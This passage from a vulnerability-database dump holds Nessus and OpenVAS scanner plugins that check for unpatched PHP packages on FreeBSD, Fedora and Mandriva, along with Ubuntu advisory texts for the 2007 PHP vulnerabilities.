TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24365);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/10 11:49:41\");\n\n script_cve_id(\"CVE-2007-0905\", \"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\");\n script_xref(name:\"Secunia\", value:\"24089\");\n\n script_name(english:\"FreeBSD : php -- multiple vulnerabilities (7fcf1727-be71-11db-b2ec-000c6ec775d9)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities have been found in PHP, including : buffer\noverflows, stack overflows, format string, and information disclosure\nvulnerabilities.\n\nThe session extension contained safe_mode and open_basedir bypasses,\nbut the FreeBSD Security Officer does not consider these real security\nvulnerabilities, since safe_mode and open_basedir are insecure by\ndesign and should not be relied upon.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/releases/4_4_5.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/releases/5_2_1.php\"\n );\n # https://vuxml.freebsd.org/freebsd/7fcf1727-be71-11db-b2ec-000c6ec775d9.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?816d763f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mod_php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mod_php4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mod_php4-twig\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php4-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php4-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php4-dtc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php4-horde\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php4-nms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php4-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php4-session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php4-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php4-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-dtc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-horde\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-nms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/02/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/02/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"php5-imap<5.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-odbc<5.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-session<5.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-shmop<5.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-sqlite<5.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-wddx<5.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5<5.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-odbc<4.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-session<4.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-shmop<4.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-wddx<4.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4<4.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mod_php4-twig>=4<4.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mod_php4-twig>=5<5.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mod_php4>=4<4.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mod_php4>=5<5.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mod_php5>=4<4.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mod_php5>=5<5.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mod_php>=4<4.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mod_php>=5<5.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-cgi>=4<4.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-cgi>=5<5.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-cli>=4<4.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-cli>=5<5.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-dtc>=4<4.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-dtc>=5<5.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-horde>=4<4.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-horde>=5<5.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-nms>=4<4.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php4-nms>=5<5.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-cgi>=4<4.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-cgi>=5<5.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-cli>=4<4.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-cli>=5<5.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-dtc>=4<4.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-dtc>=5<5.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-horde>=4<4.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-horde>=5<5.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-nms>=4<4.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5-nms>=5<5.2.1_2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2019-05-29T17:22:00", "bulletinFamily": "unix", "description": "USN-424-1 fixed vulnerabilities in PHP. However, some upstream changes were not included, which caused errors in the stream filters. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nMultiple buffer overflows have been discovered in various PHP modules. If a PHP application processes untrusted data with functions of the session or zip module, or various string functions, a remote attacker could exploit this to execute arbitrary code with the privileges of the web server. (CVE-2007-0906)\n\nThe sapi_header_op() function had a buffer underflow that could be exploited to crash the PHP interpreter. (CVE-2007-0907)\n\nThe wddx unserialization handler did not correctly check for some buffer boundaries and had an uninitialized variable. By unserializing untrusted data, this could be exploited to expose memory regions that were not meant to be accessible. Depending on the PHP application this could lead to disclosure of potentially sensitive information. (CVE-2007-0908)\n\nOn 64 bit systems (the amd64 and sparc platforms), various print functions and the odbc_result_all() were susceptible to a format string vulnerability. A remote attacker could exploit this to execute arbitrary code with the privileges of the web server. (CVE-2007-0909)\n\nUnder certain circumstances it was possible to overwrite superglobal variables (like the HTTP GET/POST arrays) with crafted session data. (CVE-2007-0910)\n\nWhen unserializing untrusted data on 64-bit platforms the zend_hash_init() function could be forced to enter an infinite loop, consuming CPU resources, for a limited length of time, until the script timeout alarm aborts the script. (CVE-2007-0988)", "modified": "2007-03-08T00:00:00", "published": "2007-03-08T00:00:00", "id": "USN-424-2", "href": "https://usn.ubuntu.com/424-2/", "title": "PHP regression", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:21:33", "bulletinFamily": "unix", "description": "Multiple buffer overflows have been discovered in various PHP modules. If a PHP application processes untrusted data with functions of the session or zip module, or various string functions, a remote attacker could exploit this to execute arbitrary code with the privileges of the web server. (CVE-2007-0906)\n\nThe sapi_header_op() function had a buffer underflow that could be exploited to crash the PHP interpreter. (CVE-2007-0907)\n\nThe wddx unserialization handler did not correctly check for some buffer boundaries and had an uninitialized variable. By unserializing untrusted data, this could be exploited to expose memory regions that were not meant to be accessible. Depending on the PHP application this could lead to disclosure of potentially sensitive information. (CVE-2007-0908)\n\nOn 64 bit systems (the amd64 and sparc platforms), various print functions and the odbc_result_all() were susceptible to a format string vulnerability. A remote attacker could exploit this to execute arbitrary code with the privileges of the web server. (CVE-2007-0909)\n\nUnder certain circumstances it was possible to overwrite superglobal variables (like the HTTP GET/POST arrays) with crafted session data. (CVE-2007-0910)\n\nWhen unserializing untrusted data on 64-bit platforms the zend_hash_init() function could be forced to enter an infinite loop, consuming CPU resources, for a limited length of time, until the script timeout alarm aborts the script. (CVE-2007-0988)", "modified": "2007-02-22T00:00:00", "published": "2007-02-22T00:00:00", "id": "USN-424-1", "href": "https://usn.ubuntu.com/424-1/", "title": "PHP vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-25T10:57:14", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=861324", "id": "OPENVAS:861324", "title": "Fedora Update for php FEDORA-2007-261", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2007-261\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language. PHP attempts to make it\n easy for developers to write dynamically generated webpages. PHP also\n offers built-in database integration for several commercial and\n non-commercial database management systems, so writing a\n database-enabled webpage with PHP is fairly simple. The most common\n use of PHP coding is probably as a replacement for CGI scripts.\n\n The php package contains the module which adds support for the PHP\n language to Apache HTTP Server.\";\n\ntag_affected = \"php on Fedora Core 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-February/msg00118.html\");\n script_id(861324);\n script_version(\"$Revision: 6622 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 07:52:50 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:01:32 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2007-261\");\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0988\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0907\", \"CVE-2007-0910\");\n script_name( \"Fedora Update for php FEDORA-2007-261\");\n\n script_summary(\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora_core\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC6\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-cli\", rpm:\"x86_64/php-cli~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-dba\", rpm:\"x86_64/php-dba~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/debug/php-debuginfo\", rpm:\"x86_64/debug/php-debuginfo~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-xml\", rpm:\"x86_64/php-xml~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php\", rpm:\"x86_64/php~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-snmp\", rpm:\"x86_64/php-snmp~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-pgsql\", rpm:\"x86_64/php-pgsql~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-bcmath\", rpm:\"x86_64/php-bcmath~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-common\", rpm:\"x86_64/php-common~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-xmlrpc\", rpm:\"x86_64/php-xmlrpc~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-mysql\", rpm:\"x86_64/php-mysql~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-ncurses\", rpm:\"x86_64/php-ncurses~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-ldap\", rpm:\"x86_64/php-ldap~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-pdo\", rpm:\"x86_64/php-pdo~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-soap\", rpm:\"x86_64/php-soap~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-odbc\", rpm:\"x86_64/php-odbc~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-mbstring\", rpm:\"x86_64/php-mbstring~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-devel\", rpm:\"x86_64/php-devel~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-imap\", rpm:\"x86_64/php-imap~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-gd\", rpm:\"x86_64/php-gd~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-ldap\", rpm:\"i386/php-ldap~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-devel\", rpm:\"i386/php-devel~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-ncurses\", rpm:\"i386/php-ncurses~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-soap\", rpm:\"i386/php-soap~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-gd\", rpm:\"i386/php-gd~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-mbstring\", rpm:\"i386/php-mbstring~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-xml\", rpm:\"i386/php-xml~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-xmlrpc\", rpm:\"i386/php-xmlrpc~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-common\", rpm:\"i386/php-common~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/debug/php-debuginfo\", rpm:\"i386/debug/php-debuginfo~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-odbc\", rpm:\"i386/php-odbc~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-dba\", rpm:\"i386/php-dba~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-bcmath\", rpm:\"i386/php-bcmath~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-pgsql\", rpm:\"i386/php-pgsql~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-snmp\", rpm:\"i386/php-snmp~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php\", rpm:\"i386/php~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-cli\", rpm:\"i386/php-cli~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-mysql\", rpm:\"i386/php-mysql~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-imap\", rpm:\"i386/php-imap~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-pdo\", rpm:\"i386/php-pdo~5.1.6~3.4.fc6\", rls:\"FC6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:43", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2018-04-06T00:00:00", "published": "2009-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830326", "id": "OPENVAS:1361412562310830326", "type": "openvas", "title": "Mandriva Update for php MDKSA-2007:048 (php)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for php MDKSA-2007:048 (php)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A number of vulnerabilities were discovered in PHP language.\n\n Many buffer overflow flaws were discovered in the PHP session\n extension, the str_replace() function, and the imap_mail_compose()\n function. An attacker able to use a PHP application using any of\n these functions could trigger these flaws and possibly execute\n arbitrary code as the apache user (CVE-2007-0906).\n \n A one-byte memory read will always occur prior to the beginning of a\n buffer, which could be triggered, for example, by any use of the\n header() function in a script (CVE-2007-0907).\n \n The wddx extension, if used to import WDDX data from an untrusted\n source, may allow a random portion of heap memory to be exposed due\n to certain WDDX input packets (CVE-2007-0908).\n \n The odbc_result_all() function, if used to display data from a\n database,\n and if the contents of the database are under the control of an\n attacker, could lead to the execution of arbitrary code due to a format\n string vulnerability (CVE-2007-0909).\n \n Several flaws in the PHP could allow attackers to clobber certain\n super-global variables via unspecified vectors (CVE-2007-0910).\n \n The zend_hash_init() function can be forced into an infinite loop\n if unserializing untrusted data on a 64-bit platform, resulting in\n the consumption of CPU resources until the script timeout alarm aborts\n the execution of the script (CVE-2007-0988).\n \n Updated package have been patched to correct this issue.\";\n\ntag_affected = \"php on Mandriva Linux 2006.0,\n Mandriva Linux 2006.0/X86_64,\n Mandriva Linux 2007.0,\n Mandriva Linux 2007.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-02/msg00019.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830326\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 13:53:01 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDKSA\", value: \"2007:048\");\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\");\n script_name( \"Mandriva Update for php MDKSA-2007:048 (php)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.1.6~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cgi\", 